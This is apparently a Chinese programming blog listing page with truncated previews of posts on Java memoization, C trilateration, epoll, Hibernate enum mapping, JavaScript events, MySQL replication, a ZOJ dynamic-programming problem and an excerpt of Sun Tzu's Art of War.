    /** * 要执行的算法,返回结果v */ public interface Computable<A, V> { public V comput(final A arg); }   /** * 用于缓存数据 */ public class Memoizer<A, V> implements Computable<A,
  • 三点定位的算法 haoningabc c算法
    三点定位, 已知a,b,c三个顶点的x,y坐标 和三个点都z坐标的距离,la,lb,lc 求z点的坐标 原理就是围绕a,b,c 三个点画圆,三个圆焦点的部分就是所求 但是,由于三个点的距离可能不准,不一定会有结果, 所以是三个圆环的焦点,环的宽度开始为0,没有取到则加1 运行 gcc -lm test.c test.c代码如下 #include "stdi
  • epoll使用详解 jimmee clinux服务端编程epoll
    epoll - I/O event notification facility在linux的网络编程中,很长的时间都在使用select来做事件触发。在linux新的内核中,有了一种替换它的机制,就是epoll。相比于select,epoll最大的好处在于它不会随着监听fd数目的增长而降低效率。因为在内核中的select实现中,它是采用轮询来处理的,轮询的fd数目越多,自然耗时越多。并且,在linu
  • Hibernate对Enum的映射的基本使用方法 linzx0212 enumHibernate
      枚举   /** * 性别枚举 */ public enum Gender { MALE(0), FEMALE(1), OTHER(2); private Gender(int i) { this.i = i; } private int i; public int getI
  • 第10章 高级事件(下) onestopweb 事件
    index.html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/
  • 孙子兵法 roadrunners 孙子兵法
    始计第一 孙子曰: 兵者,国之大事,死生之地,存亡之道,不可不察也。 故经之以五事,校之以计,而索其情:一曰道,二曰天,三曰地,四曰将,五 曰法。道者,令民于上同意,可与之死,可与之生,而不危也;天者,阴阳、寒暑 、时制也;地者,远近、险易、广狭、死生也;将者,智、信、仁、勇、严也;法 者,曲制、官道、主用也。凡此五者,将莫不闻,知之者胜,不知之者不胜。故校 之以计,而索其情,曰
  • MySQL双向复制 tomcat_oracle mysql
    本文包括: 主机配置 从机配置 建立主-从复制 建立双向复制   背景 按照以下简单的步骤: 参考一下: 在机器A配置主机(192.168.1.30) 在机器B配置从机(192.168.1.29) 我们可以使用下面的步骤来实现这一点   步骤1:机器A设置主机 在主机中打开配置文件 ,
  • zoj 3822 Domination(dp) 阿尔萨斯 Mina
    题目链接:zoj 3822 Domination 题目大意:给定一个N∗M的棋盘,每次任选一个位置放置一枚棋子,直到每行每列上都至少有一枚棋子,问放置棋子个数的期望。 解题思路:大白书上概率那一张有一道类似的题目,但是因为时间比较久了,还是稍微想了一下。dp[i][j][k]表示i行j列上均有至少一枚棋子,并且消耗k步的概率(k≤i∗j),因为放置在i+1~n上等价与放在i+1行上,同理
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他